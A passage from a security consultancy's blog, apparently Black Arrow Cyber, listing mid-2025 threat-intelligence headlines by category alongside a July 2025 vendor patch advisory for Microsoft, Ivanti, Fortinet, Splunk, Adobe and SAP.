Suspected Hacker Linked to Silk Typhoon Arrested in Milan

North American APT Uses Exchange Zero-Day to Attack China

TikTok’s Handling of EU User Data in China Comes Under Scrutiny Again - Infosecurity Magazine

Tribunal Ruling Brings ICO’s £12.7m TikTok Fine Closer - Infosecurity Magazine

Chinese Video Surveillance Vendor Hikvision to Fight Canadian Ban - Infosecurity Magazine

Taiwan Flags Chinese Apps Over Data Security Violations - Infosecurity Magazine

Taiwan NSB Alerts Public on Data Risks from TikTok, Weibo, and RedNote Over China Ties

Chinese State-Sponsored Hacker Charged Over COVID-19 Research Theft - Infosecurity Magazine

NightEagle APT Exploits Microsoft Exchange Flaw to Target China's Military and Tech Sectors

Russia

UK looking to revamp defence laws as undersea cable sabotage and cyber attacks create 'gray zone threats' | PC Gamer

Even children can help counter threats bringing ‘war to our doorstep’, MPs say | The Independent

Teach children how to catch Russian spies online, MPs told

Russia-linked macOS malware adds dangerous backdoor| Cybernews

Russia Launches Spy Ship to Target NATO Undersea Cables — UNITED24 Media

Survey: war, cyber attacks top security concerns; support for European cooperation grows | NL Times

Ex-ASML engineer who stole chip tech for Russia gets 3 years • The Register

French police arrest Russian pro basketball player on behalf of US over ransomware suspicions | CyberScoop

Two new pro-Russian hacktivist groups target Ukraine, recruit insiders | The Record from Recorded Future News

France accuses Russia of cyber attacks on public services, private companies, and media outlets · Global Voices Advox

Ukraine participated for the first time in the meeting of the EU National Cyber Security Coordination Centers and the meeting of the Steering Board of the European Cyber Security Competence Center - National Security and Defence Council of Ukraine

Cyber attack deals blow to Russian firmware used to repurpose civilian drones for Ukraine war | The Record from Recorded Future News

US airman admits leaking secrets on dating app • The Register

French cops cuff Russian hoopster for alleged ransomware • The Register

A Clever Russian Phishing Attack Using Fake State Department Employees

Looking Tough: Russia Trumpets Pro-Ukraine Hacker Arrests

Russia rejects ethical hacking bill • The Register

Spyware Campaign Hits Russian Industrial Firms

Russian airports crippled as 171 Moscow flights canceled

Researchers Uncover Batavia Windows Spyware Stealing Documents from Russian Firms

Iran

UK faces rising and unpredictable threat from Iran, report warns

Rising threat of assassination and kidnap attempts by Iran in UK – Channel 4 News

'Physical threat' from Iran on people living in UK has 'increased significantly', watchdog says | UK News | Sky News

Iranian ransomware crew promises big bucks for US attacks • The Register

Missiles go silent but Iran-Israel cyber war is just ramping up | Iran International

The Iran-Israel War Returns to the Shadows, for Now

Iranian-linked hacker group targets Iran International journalists in cyber attack - Committee to Protect Journalists

North Korea

DOJ Disrupts North Korean IT Worker Schemes Targeting U.S

US sanctions alleged North Korean IT sweatshop leader • The Register

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

DoNot APT is expanding scope targeting European foreign ministries

TAG-140 Deploys DRAT V2 RAT, Targeting Indian Government, Defence, and Rail Sectors

Tools and Controls

FBI Warns Hackers Are Exploiting Remote Desktop Protocol (RDP)

The Cost of Unpreparedness: Why Many Businesses Lack a Continuity Strategy | Entrepreneur

The MFA You Trust Is Lying to You – and Here's How Attackers Exploit It

Technology outpaces security adaptation, says Bitdefender

Many companies are still failing to budget for cyber security | TechRadar

LLMs Fall Short in Vulnerability Discovery and Exploitation - Infosecurity Magazine

Vibe Hacking Not Yet Possible - InfoRiskToday

CISOs urged to fix API risk before regulation forces their hand - Help Net Security

MSPs Under More Scrutiny From Customers on Cyber Than Ever - IT Security Guru

Hackers abuse leaked Shellter red team tool to deploy infostealers

AI built it, but can you trust it? - Help Net Security

Ransomware negotiator allegedly struck deals with hackers to profit from extortion payments | TechSpot

Will AI Gut the Cyber Security Talent Pipeline?

How passkeys work: The complete guide to your inevitable passwordless future | ZDNET

Cloud security maintains its position as top spending priority - Help Net Security

Cyber insurance confronts the age of intelligent threats | Insurance Business America

PayPal's AI-powered scam alert system might intercept your transactions now - here's why | ZDNET

Other News

Data sovereignty is now a cyber security imperative - Tech Monitor

FBI Warns Hackers Are Exploiting Remote Desktop Protocol (RDP)

Technology outpaces security adaptation, says Bitdefender

Survey: war, cyber attacks top security concerns; support for European cooperation grows | NL Times

SMEs warned of 'serious consequences' if not prepared for cyber attacks | Insurance Times

Cyber attacks could exploit home solar panels to disrupt power grids | New Scientist

82% of North American Hotels Were Hit with a Cyber Attack Last Summer, According to New VikingCloud Research

Vulnerability Management

LLMs Fall Short in Vulnerability Discovery and Exploitation - Infosecurity Magazine

Vibe Hacking Not Yet Possible - InfoRiskToday

End of life for Microsoft Office puts malicious macros in the security spotlight | CSO Online

5 critical reasons why keeping your android security updates current is more important than ever

Vulnerabilities

Microsoft Patches 130 Vulnerabilities, Including Critical Flaws in SPNEGO and SQL Server

End of life for Microsoft Office puts malicious macros in the security spotlight | CSO Online

Invisible UI flaw gives hackers full Android access | Cybernews

Check for CitrixBleed 2 exploitation even if you patched quickly! (CVE-2025-5777) - Help Net Security

Ivanti, Fortinet, Splunk Release Security Updates - SecurityWeek

AMD warns of new Meltdown, Spectre-like bugs affecting CPUs • The Register

New Linux Security Flaw Can Bypass Disk Encryption - OMG! Ubuntu

Multiple Apache Tomcat Vulnerabilities Let Attackers Trigger DoS Attacks

CISA Adds Four Critical Vulnerabilities to KEV Catalog Due to Active Exploitation

SAP Patches Critical Flaws That Could Allow Remote Code Execution, Full System Takeover - SecurityWeek

ServiceNow Flaw CVE-2025-3648 Could Lead to Data Exposure via Misconfigured ACLs

Millions of Cars Exposed to Remote Hacking via PerfektBlue Attack - SecurityWeek

Microsoft Confirms Windows 11 Update Causes Security Firewall Error

Unpatched Ruckus Vulnerabilities Allow Wireless Environment Hacking - SecurityWeek

Critical mcp-remote Vulnerability Enables Remote Code Execution, Impacting 437,000+ Downloads

North American APT Uses Exchange Zero-Day to Attack China

Sector Specific

Industry specific threat intelligence reports are available.

· Automotive

· Construction

· Critical National Infrastructure (CNI)

· Defence & Space

· Education & Academia

· Energy & Utilities

· Estate Agencies

· Financial Services

· FinTech

· Food & Agriculture

· Gaming & Gambling

· Government & Public Sector (including Law Enforcement)

· Health/Medical/Pharma

· Hotels & Hospitality

· Insurance

· Legal

· Manufacturing

· Maritime & Shipping

· Oil, Gas & Mining

· OT, ICS, IIoT, SCADA & Cyber-Physical Systems

· Retail & eCommerce

· Small and Medium Sized Businesses (SMBs)

· Startups

· Telecoms

· Third Sector & Charities

· Transport & Aviation

· Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Black Arrow Admin 09/07/2025 Black Arrow Admin 09/07/2025

Black Arrow Cyber Advisory 09 July 2025 – Security Updates from Microsoft, Ivanti, Fortinet, Splunk, Adobe, and SAP

Executive Summary

Microsoft’s July 2025 Patch Tuesday addressed 137 vulnerabilities, including a publicly disclosed zero-day in SQL Server, 14 critical issues (primarily remote code execution) in Office and Windows components, and a range of privilege escalation, information disclosure, denial-of-service, and spoofing flaws affecting Office and Office Components, .NET and Visual Studio, Azure, Teams, Hyper-V, Windows BitLocker, Microsoft Edge (Chromium-based), and the Windows Cryptographic Service.
Ivanti released advisory AV25‑405 on 8 July, fixing 11 vulnerabilities across Connect Secure (ICS), Policy Secure (IPS), Endpoint Manager (EPM), and Endpoint Manager Mobile (EPMM), including high-severity flaws that impact authentication, credential decryption, and OS command injection.
Fortinet published eight security advisories covering one critical, one high, five medium, and one low severity vulnerabilities affecting FortiAnalyzer, FortiProxy, FortiOS, FortiSandbox, FortiVoice, and FortiWeb.
Splunk this week issued 12 advisories that resolve critical and high-severity flaws in third-party dependencies in Splunk SOAR, Enterprise, and DB Connect. Additionally, the company announced fixes for seven medium- and one low-severity issue in Splunk Enterprise.
Adobe announced the rollout of security fixes for 58 vulnerabilities across 13 products, including three critical-severity flaws in Adobe Connect, ColdFusion, and Experience Manager Forms (AEM Forms) on JEE.
SAP announced the release of 27 new and four updated security notes as part of its July 2025 Security Patch Day, including six that address critical vulnerabilities.

What’s the risk to me or my business?
This month’s releases cover major vendor ecosystems and include both publicly disclosed and critical vulnerabilities. Unpatched systems are vulnerable to SQL Server information disclosure, Office/Windows RCEs, credential decryption in Ivanti, command injection in Fortinet devices, package-level compromises in Splunk SOAR, Adobe application attacks, and insecure deserialization in SAP, which can lead to full system compromise or data breaches.

What can I do?

Black Arrow recommends promptly applying the available security updates for all affected products. Prioritise patches for vulnerabilities that are actively exploited or rated as critical or high severity. Regularly review and update your organisation's security policies and ensure that all systems are running supported and up-to-date software versions.

Microsoft

Further details on specific updates within this Microsoft patch Tuesday can be found here:

https://msrc.microsoft.com/update-guide/releaseNote/2025-Jul

Ivanti, Fortinet, Splunk, Adobe, SAP

Further details of the vulnerabilities in affected Ivanti, Fortinet, Splunk, Adobe, SAP products:

https://www.ivanti.com/blog/july-security-update-2025

https://www.fortiguard.com/psirt

https://advisory.splunk.com/advisories/SVD-2025-0712

https://helpx.adobe.com/security.html

https://support.sap.com/en/my-support/knowledge-base/security-notes-news/july-2025.html

#threatadvisory #threatintelligence #cybersecurity

Black Arrow Admin 06/07/2025 Black Arrow Admin 06/07/2025

Black Arrow Cyber Threat Intelligence Briefing 04 July 2025

Black Arrow Cyber Threat Intelligence Briefing 04 July 2025:

-Hackers Using PDFs to Impersonate Microsoft, DocuSign, and More in Callback Phishing Campaigns

-You Can’t Trust AI Chatbots Not to Serve You Phishing Pages or Malicious Downloads

-90% Aren’t Ready for AI Attacks, Are You?

-Over 1,000 Small Office Devices Hacked in China-linked LapDogs Cyber Espionage Campaign

-Qantas Confirms Cyber Attack Exposed Records of Up to 6 Million Customers

-Third-Party Breaches Double, Creating Ripple Effects Across Industries

-Automation and Vulnerability Exploitation Drive Mass Ransomware Breaches

-A Group of Young Cyber Criminals Poses the ‘Most Imminent Threat’ of Cyber Attacks Right Now

-Scam Centres Expand Global Footprint with Trafficked Victims

-The SMB Wake-Up Call: Downtime, Dollars, and Data Loss

-Many Global Execs Identify Cyber Risk as Top Concern, Beazley

-Cyber Security is a Boardroom Imperative: New Data Reveals Urgency for Proactive Defence

-Rethinking Cyber Risk as Traditional Models Fall Short

Executive Summary

This week, we begin our review with details of evolving cyber attacks that organisations should address in managing their risks. Attackers are impersonating trusted brands through phishing emails containing PDF attachments and phone numbers for fake support centres, while others are targeting the routers used in homes and small offices. The cyber risks of using AI are also developing, including AI chatbots that present malicious links to users. Attackers are successfully gaining access to victims’ data and systems through third parties the victims work with, such as the recently disclosed attack at Qantas.

We share details of other attack tactics, including those used by the highly active Scattered Spider group, the emerging of scam centres located around the world, and the use of automated scanning and mass exploitation of security flaws. We conclude with the perspective of business leaders, noting a sharp rise in executives naming cyber risk as their main concern, as over 60% of UK organisations are affected by incidents.

We find that a key element of successful cyber security begins with a leadership team that understands and is confident in managing their own cyber risks. This requires a boardroom-level conversation on contemporary cyber risks and how to govern them proportionately. Contact us for details of our Senior Leadership Risk and Governance Workshops.

Governance, Risk and Compliance

10 tough cyber security questions every CISO must answer | CSO Online

More than 25% of UK businesses hit by cyber attack in last year, report finds | Business | The Guardian

Reputation Risk Can Overshadow Ransom in Cyber Attacks, Aon Says

CISOs must rethink defence playbooks as cyber criminals move faster, smarter | CSO Online

Rethinking Cyber Risk as Traditional Models Fall Short

Many global execs identify cyber risk as top concern -- Beazley | Insurance Business America

Cyber Security is a Boardroom Imperative: New Data Reveals Urgency for Proactive Defence | Pressat

Beazley Report: Executives Misjudge Cyber Preparedness

The CISO evolution: From security gatekeeper to strategic leader | TechTarget

How CISOs Can Manage and Reduce Compliance Fatigue

Coalition: SMB Threat Awareness is High, but Security Spending Is Not | MSSP Alert

The SMB Wake-Up Call: Downtime, Dollars, and Data Loss | MSSP Alert

Threats

Ransomware, Extortion and Destructive Attacks

A Group of Young Cyber Criminals Poses the ‘Most Imminent Threat’ of Cyber Attacks Right Now | WIRED

More than 25% of UK businesses hit by cyber attack in last year, report finds | Business | The Guardian

Reputation Risk Can Overshadow Ransom in Cyber Attacks, Aon Says

Inside Scattered Spider: The notorious teen hackers causing chaos online | The Independent

Ransomware Reshaped How Cyber Insurers Perform Security Assessments

Automation and Vulnerability Exploitation Drive Mass Ransomware Breach - Infosecurity Magazine

KnowBe4 Urges Organisations to Recognize Social Engineering's Critical Role in Ransomware Surge

Like Ransoming a Bike: Organisational Muscle Memory Drives the Most Effective Response - SecurityWeek

SafePay Ransomware: What You Need To Know | Fortra

The FBI warns that Scattered Spider is now targeting the airline sector

RansomHub Ransomware Attacking RDP Servers Using Mimikatz and Advanced IP Scanner Tools

US sanctions bulletproof hosting provider for supporting ransomware, infostealer operations | CyberScoop

Hawaiian Airlines Hacked as Aviation Sector Warned of Scattered Spider Attacks - SecurityWeek

FBI Issues Warning After Hackers Breach Major US Airlines | Rock Hill Herald

Nearly half of ransomware victims still pay out, says Sophos • The Register

Hunters International ransomware shuts down, releases free decryptors

Cl0p data exfiltration tool found vulnerable to RCE attacks • The Register

Ransomware Victims

More than 25% of UK businesses hit by cyber-attack in last year, report finds | Business | The Guardian

Scattered Spider Taps CFO Account in 'Scorched Earth' Breach

Teardown: How Scattered Spider Hacked a Logistics Firm

Scattered Spider strikes again? Aviation industry appears to be next target for criminal group | CyberScoop

Radix cyber attack: Swiss federal data at risk | Cybernews

Swiss government data published following supply chain attack – here’s what we know about the culprits | IT Pro

M&S will be over the worst of cyber attack impact by August, says CEO | Reuters

The Same Cyber Hacking Group Breached 3 Airlines In 3 Weeks

FBI Issues Warning After Hackers Breach Major US Airlines | Rock Hill Herald

Humac Apple reseller targeted by Kraken ransomware | Cybernews

People warned to watch out for scam emails following cyber attack on M&S | The Standard

IdeaLab confirms data stolen in ransomware attack last year

Phishing & Email Based Attacks

71% of new hires click on phishing emails within 3 months - Help Net Security

More than 25% of UK businesses hit by cyber attack in last year, report finds | Business | The Guardian

KnowBe4 Urges Organisations to Recognize Social Engineering's Critical Role in Ransomware Surge

Hackers Using PDFs to Impersonate Microsoft, DocuSign, and More in Callback Phishing Campaigns

You can't trust AI chatbots not to serve you phishing pages, malicious downloads, or bad code - Help Net Security

ChatGPT creates phisher’s paradise by serving wrong URLs • The Register

Phishers built fake Okta and Microsoft 365 login sites with AI - here's how to protect yourself | ZDNET

Like SEO, LLMs May Soon Fall Prey to Phishing Scams

Hackers use Vercel's generative AI development tool to create phishing sites

Criminals Sending QR Codes in Phishing, Malware Campaigns

Why 95% of phishing attacks go unreported in healthcare | TechRadar

Russian APT 'Gamaredon' Hits Ukraine With Fierce Phishing

Business Email Compromise (BEC)/Email Account Compromise (EAC)

More than 25% of UK businesses hit by cyber attack in last year, report finds | Business | The Guardian

Other Social Engineering

KnowBe4 Urges Organisations to Recognize Social Engineering's Critical Role in Ransomware Surge

Jasper Sleet: North Korean remote IT workers’ evolving tactics to infiltrate organisations | Microsoft Security Blog

US shuts down a string of North Korean IT worker scams • The Register

50 customers of French bank hit after insider helped SIM swap scammers

Scope, Scale of Spurious North Korean IT Workers Emerges

Fraud, Scams and Financial Crime

Scam Centres Expand Global Footprint with Trafficked Victims - Infosecurity Magazine

People warned to watch out for scam emails following cyber attack on M&S | The Standard

Patients, providers duped in records-and-payment scam • The Register

ESET Warns of NFC Data for Contactless Payments Emerges as Cyber Crime Target

International Taskforce Dismantles €460m Crypto Fraud Network - Infosecurity Magazine

Police dismantles investment fraud ring stealing €10 million

Glasgow council parking scam messages warning amid cyber incident | The National

Lazarus Group strikes again in $3.2M Solana heist | Cryptopolitan

FBI: Cyber criminals steal health data posing as fraud investigators

Scammers are tricking travelers into booking trips that don't exist - Help Net Security

Artificial Intelligence

You can't trust AI chatbots not to serve you phishing pages, malicious downloads, or bad code - Help Net Security

Hackers don’t need your employees anymore, AI agents are now doing the dirty work for them | TechRadar

90% aren't ready for AI attacks, are you? - Help Net Security

Phishers built fake Okta and Microsoft 365 login sites with AI - here's how to protect yourself | ZDNET

Like SEO, LLMs May Soon Fall Prey to Phishing Scams

Hackers use Vercel's generative AI development tool to create phishing sites

Cyber criminals are abusing LLMs to help them with hacking activities | TechRadar

Are we securing AI like the rest of the cloud? - Help Net Security

AI cyber security readiness remains low globally as 90% of firms face elevated threat risks

Germany asks Google, Apple to remove DeepSeek AI from app stores

The Rise of Agentic AI: Uncovering Security Risks in AI Web Agents - Security Boulevard

AI on the Frontline: Global Firms Back Innovation, Brace for New Cyber Threats

How cyber criminals are weaponizing AI and what CISOs should do about it - Help Net Security

Cloudflare declares war on AI crawlers - and the stakes couldn't be higher | ZDNET

Denmark to tackle deepfakes by giving people copyright to their own features | Deepfake | The Guardian

Malware

Criminals Sending QR Codes in Phishing, Malware Campaigns

US sanctions bulletproof hosting provider for supporting ransomware, infostealer operations | CyberScoop

GIFTEDCROOK Malware Evolves: From Browser Stealer to Intelligence-Gathering Tool

Chinese Group Silver Fox Uses Fake Websites to Deliver Sainbox RAT and Hidden Rootkit

AsyncRAT Campaign Continues to Evade Endpoint Detection | MSSP Alert

SMBs are being hit by malicious productivity tools – Zoom and ChatGPT spoofed by hackers | TechRadar

Over 40 Malicious Firefox Extensions Target Cryptocurrency Wallets, Stealing User Assets

North Korean Hackers Target Crypto Firms with Novel macOS Malware - Infosecurity Magazine

North Korean Hackers Target Web3 with Nim Malware and Use ClickFix in BabyShark Campaign

Mobile

Germany asks Google, Apple to remove DeepSeek AI from app stores

50 customers of French bank hit after insider helped SIM swap scammers

Google hit with $314m fine for collecting data from idle Android phones without permission

Denial of Service/DoS/DDoS

Cloudflare blocks largest DDoS attack - here's how to protect yourself | ZDNET

Internet of Things – IoT

Over 1,000 SOHO Devices Hacked in China-linked LapDogs Cyber Espionage Campaign

Smart Tractors Vulnerable to Full Takeover

Canada orders Chinese CCTV biz Hikvision to quit the country • The Register

Data Breaches/Leaks

Qantas confirms cyber-attack exposed records of up to 6 million customers | Qantas | The Guardian

Ahold Delhaize Data Breach Impacts 2.2 Million People - SecurityWeek

Dark Web Vendors Shift to Third Parties, Supply Chains

FBI: Cyber criminals steal health data posing as fraud investigators

Kelly Benefits data breach has impacted 550,000 people

Growing cyber security apathy is a growing crisis - Tech Monitor

Esse Health says recent data breach affects over 263,000 patients

Undetectable Android Spyware Backfires, Leaks 62,000 User Logins - SecurityWeek

Organised Crime & Criminal Actors

Scam Centres Expand Global Footprint with Trafficked Victims - Infosecurity Magazine

ESET Warns of NFC Data for Contactless Payments Emerges as Cyber Crime Target

Inside Scattered Spider: The notorious teen hackers causing chaos online | The Independent

Slavery, torture, human trafficking discovered at 53 Cambodian online scamming compunds | CyberScoop

US sanctions yet another Russian bulletproof hosting outfit • The Register

When hackers become hitmen • Graham Cluley

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

Jasper Sleet: North Korean remote IT workers’ evolving tactics to infiltrate organisations | Microsoft Security Blog

US shuts down a string of North Korean IT worker scams • The Register

Over 40 Malicious Firefox Extensions Target Cryptocurrency Wallets, Stealing User Assets

North Korean Hackers Target Crypto Firms with Novel macOS Malware - Infosecurity Magazine

North Korean Hackers Target Web3 with Nim Malware and Use ClickFix in BabyShark Campaign

International Taskforce Dismantles €460m Crypto Fraud Network - Infosecurity Magazine

Fraudsters behind €460 million crypto scam arrested in Spain - Help Net Security

Lazarus Group strikes again in $3.2M Solana heist | Cryptopolitan

Insider Risk and Insider Threats

Jasper Sleet: North Korean remote IT workers’ evolving tactics to infiltrate organisations | Microsoft Security Blog

US shuts down a string of North Korean IT worker scams • The Register

Scope, Scale of Spurious North Korean IT Workers Emerges

50 customers of French bank hit after insider helped SIM swap scammers

Seven months for IT worker who trashed his work network • The Register

New hires, new targets: Why attackers love your onboarding process - Help Net Security

The Human Firewall: even with AI, humans are still the last line of defence in cyber security | TechRadar

Disgruntled IT worker launched cyber attack costing former employer £200,000 within hours

Insurance

Ransomware Reshaped How Cyber Insurers Perform Security Assessments

Supply Chain and Third Parties

Dark Web Vendors Shift to Third Parties, Supply Chains

Swiss government data published following supply chain attack – here’s what we know about the culprits | IT Pro

Third-party breaches double, creating ripple effects across industries - Help Net Security

Cloud/SaaS

Are we securing AI like the rest of the cloud? - Help Net Security

MOVEit Transfer Faces Increased Threats as Scanning Surges and CVE Flaws Are Targeted

Outages

Report highlights the cost of network failures for businesses ...

Internet outages are costing companies millions every month - Help Net Security

Encryption

EU’s Encryption Reforms Sparks Widespread Expert Concerns And Alarm – OpEd – Eurasia Review

Linux and Open Source

Linux Users Urged to Patch Critical Sudo CVE - Infosecurity Magazine

Critical Sudo Vulnerabilities Let Local Users Gain Root Access on Linux, Impacting Major Distros

Passwords, Credential Stuffing & Brute Force Attacks

Director of US intelligence earns €177,000 per year and couldn't prevent a hacker from stealing her passwords - Glass Almanac

Regulations, Fines and Legislation

Cyber Resilience Is Key: The Never-Ending Delays of NIS2 Implementation | King & Spalding - JDSupra

UK eyes new laws over cable sabotage • The Register

Google hit with $314m fine for collecting data from idle Android phones without permission

EU’s Encryption Reforms Sparks Widespread Expert Concerns And Alarm – OpEd – Eurasia Review

Patrick Ware Named Executive Director of US Cyber Command - SecurityWeek

Hospitals’ cyber security: EU regions warn Commission’s approach is ‘troubling’ - Euractiv

Models, Frameworks and Standards

Cyber Resilience Is Key: The Never-Ending Delays of NIS2 Implementation | King & Spalding - JDSupra

Data Protection

Google hit with $314m fine for collecting data from idle Android phones without permission

Careers, Working in Cyber and Information Security

Why Cyber Security Should Rethink Inclusion For Neurodivergent People

Law Enforcement Action and Take Downs

Scam centres are spreading, and so is the human cost - Help Net Security

Seven months for IT worker who trashed his work network • The Register

US sanctions bulletproof hosting provider for supporting ransomware, infostealer operations | CyberScoop

Police dismantles investment fraud ring stealing €10 million

Europol shuts down Archetyp Market, longest-running dark web drug marketplace

Disgruntled IT worker launched cyber attack costing former employer £200,000 within hours

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

Over 1,000 SOHO Devices Hacked in China-linked LapDogs Cyber Espionage Campaign

Ex-NATO hacker: In cyber, there’s no such thing a ceasefire • The Register

UK eyes new laws over cable sabotage • The Register

Cyber attacks by Iranian hackers may be incoming | Cybernews

Nation State Actors

China

Over 1,000 SOHO Devices Hacked in China-linked LapDogs Cyber Espionage Campaign

Chinese Group Silver Fox Uses Fake Websites to Deliver Sainbox RAT and Hidden Rootkit

Initial Access Broker Self-Patches Zero Days as Turf Control

China-linked group Houken hit French organisations using zero-days

UK eyes new laws over cable sabotage • The Register

The Business for Zero Day Exploits in the US is Broken - Bloomberg

Chinese Hackers Exploit Ivanti CSA Zero-Days in Attacks on French Government, Telecoms

Canada orders Chinese CCTV biz Hikvision to quit the country • The Register

Germany asks Google, Apple to remove DeepSeek AI from app stores

Silver Fox Suspected in Taiwan Campaign Using DeepSeek

Russia

US sanctions yet another Russian bulletproof hosting outfit • The Register

UK eyes new laws over cable sabotage • The Register

Inside Russia’s secret digital war on NATO’s logistics lifeline to Ukraine - Euromaidan Press

Russia’s throttling of Cloudflare makes sites inaccessible

Calling Out Russia: France’s Shift on Public Attribution – War on the Rocks

Russia jails man for 16 years over pro-Ukraine cyber attacks on critical infrastructure | The Record from Recorded Future News

Russian APT 'Gamaredon' Hits Ukraine With Fierce Phishing

Iran

Iran-linked hackers resurface, threaten to release more stolen Trump emails | Cybernews

Iran-linked hackers may target US firms and critical infrastructure, US government warns

Iranian Cyber Threats Persist Despite Ceasefire, US Intelligence Warns - Infosecurity Magazine

The Evolving Iranian Cyber Threat | AFCEA International

Iran's cyber threat largely fizzled much like its military during Israeli and US strikes | The Times of Israel

North Korea

Jasper Sleet: North Korean remote IT workers’ evolving tactics to infiltrate organisations | Microsoft Security Blog

US shuts down a string of North Korean IT worker scams • The Register

Scope, Scale of Spurious North Korean IT Workers Emerges

Microsoft shuts down 3,000 email accounts created by North Korean IT workers | The Record from Recorded Future News

29 North Korean laptop farms busted by US Department of Justice — illicit IT workers across 16 states reportedly obtained employment with more than 100 US companies to help fund regime | Tom's Hardware

US steps up pursuit of hackers linked to North Korea’s nuclear programme

Lazarus Group strikes again in $3.2M Solana heist | Cryptopolitan

North Korean Hackers Target Crypto Firms with Novel macOS Malware - Infosecurity Magazine

North Korean Hackers Target Web3 with Nim Malware and Use ClickFix in BabyShark Campaign

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

Security breach reveals Catwatchful spyware is snooping on thousands of phones - here's how to stay safe | TechRadar

Undetectable Android Spyware Backfires, Leaks 62,000 User Logins - SecurityWeek

Tools and Controls

Like Ransoming a Bike: Organisational Muscle Memory Drives the Most Effective Response - SecurityWeek

CISOs must rethink defence playbooks as cyber criminals move faster, smarter | CSO Online

Over 1,000 SOHO Devices Hacked in China-linked LapDogs Cyber Espionage Campaign

Internet outages are costing companies millions every month - Help Net Security

The Human Firewall: even with AI, humans are still the last line of defence in cyber security | TechRadar

71% of new hires click on phishing emails within 3 months - Help Net Security

Reputation Risk Can Overshadow Ransom in Cyber Attacks, Aon Says

Microsoft admits to Intune forgetfulness • The Register

Why AV is an overlooked cyber security risk | TechRadar

Financial and insurance industry needs a new approach to risk mitigation - Digital Journal

New hires, new targets: Why attackers love your onboarding process - Help Net Security

AsyncRAT Campaign Continues to Evade Endpoint Detection | MSSP Alert

Let’s Encrypt ends certificate expiry emails to cut costs, boost privacy

How to Reduce Alert Fatigue in Cyber Security - Security Boulevard

Other News

Financial and insurance industry needs a new approach to risk mitigation - Digital Journal

Report highlights the cost of network failures for businesses ...

The Same Cyberhacking Group Breached 3 Airlines In 3 Weeks

Coalition: SMB Threat Awareness is High, but Security Spending Is Not | MSSP Alert

The SMB Wake-Up Call: Downtime, Dollars, and Data Loss | MSSP Alert

International Criminal Court hit by cyber attack - iTnews

Swiss Regulator Pressures Swissquote Over Rising Cyber Crime Risks: Report

The Cyber Risk SMBs Can’t Afford To Ignore

Why every company needs a travel security program | CSO Online

Why UK cyber security has become so vulnerable - UKTN

Cyber attacks shake voters’ trust in elections, regardless of party

Retail, the industry hackers can’t resist | theHRD

Security Bite: How hackers can take over your Mac using Bluetooth - 9to5Mac

Hacker helped kill FBI sources, witnesses in El Chapo case, according to watchdog report | CyberScoop

NTLM relay attacks are back from the dead - Help Net Security

Cornwall school forced to shut over cyber security issue - Cornwall Live

Cyber in the energy sector, from reaction to resilience | Professional Security Magazine

Germany seeks Israeli partnership on cyber defence, plans 'cyber dome' | Reuters

UK firms are 'sleepwalking' into smart building cyber threats | IT Pro

Cyber attacks are draining millions from the hospitality industry - Help Net Security

Two-thirds of EU bodies earn lowest security grades | Cybernews

Hospitals’ cyber security: EU regions warn Commission’s approach is ‘troubling’ - Euractiv

Vulnerability Management

11 Million Critical Vulnerabilities Exposed — Act Now

A third of threats left unremeditated for 90 days - IT Security Guru

Initial Access Broker Self-Patches Zero Days as Turf Control

Vulnerability Debt: Putting a Price on What to Fix

The Business for Zero Day Exploits in the US is Broken - Bloomberg

Vulnerabilities

Evidence Suggests Exploitation of CitrixBleed 2 Vulnerability - SecurityWeek

Thousands of Citrix NetScaler Instances Unpatched Against Exploited Vulnerabilities - SecurityWeek

Initial Access Broker Self-Patches Zero Days as Turf Control

China-linked group Houken hit French organisations using zero-days

Linux Users Urged to Patch Critical Sudo CVE - Infosecurity Magazine

Critical Sudo Vulnerabilities Let Local Users Gain Root Access on Linux, Impacting Major Distros

MOVEit Transfer Faces Increased Threats as Scanning Surges and CVE Flaws Are Targeted

Google Issues Emergency Patch for Fourth Chrome Zero-Day of 2025 - Infosecurity Magazine

Sudo local privilege escalation vulnerabilities fixed (CVE-2025-32462, CVE-2025-32463) - Help Net Security

Critical Vulnerability in Anthropic's MCP Exposes Developer Machines to Remote Exploits

Millions of headphones vulnerable to Bluetooth hacks | Cybernews

Cisco warns that Unified CM has hardcoded root SSH credentials

Cisco fixes maximum-severity flaw in enterprise unified comms platform (CVE-2025-20309) - Help Net Security

Urgent Update: Microsoft Edge Fixes Actively Exploited Chromium Vulnerability

WordPress Plugin Flaw Exposes 600,000 Sites to File Deletion - Infosecurity Magazine

Chinese Hackers Exploit Ivanti CSA Zero-Days in Attacks on French Government, Telecoms

Bluetooth flaws could let hackers spy through your microphone

CISA tells TeleMessage users to patch after active exploits • The Register

Sector Specific

Industry specific threat intelligence reports are available.

· Automotive

· Construction

· Critical National Infrastructure (CNI)

· Defence & Space

· Education & Academia

· Energy & Utilities

· Estate Agencies

· Financial Services

· FinTech

· Food & Agriculture

· Gaming & Gambling

· Government & Public Sector (including Law Enforcement)

· Health/Medical/Pharma

· Hotels & Hospitality

· Insurance

· Legal

· Manufacturing

· Maritime & Shipping

· Oil, Gas & Mining

· OT, ICS, IIoT, SCADA & Cyber-Physical Systems

· Retail & eCommerce

· Small and Medium Sized Businesses (SMBs)

· Startups

· Telecoms

· Third Sector & Charities

· Transport & Aviation

· Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Black Arrow Admin 29/06/2025 Black Arrow Admin 29/06/2025

Black Arrow Cyber Threat Intelligence Briefing 27 June 2025

Black Arrow Cyber Threat Intelligence Briefing 27 June 2025:

-Nearly Half of Companies Opt to Pay the Ransom, Sophos Report Finds

-New Hires More Likely to Fall for Phishing and Social Engineering Attacks

-BT Warns UK SMEs Are Primary Targets for Hackers as Only Three in Five Have Had Cyber Security Training

-More than Half of Cyber Security Professionals Told to Conceal Breaches, Survey Claims

-Half of Security Pros Want GenAI Deployment Pause

-Cyber Attacks on Insurers Put CFOs on High Alert

-Scattered Spider Behind Cyber Attacks on M&S and Co-op, Causing Up to £440M in Damages, Widening Attacks to Insurance, Aviation and Transportation Sectors

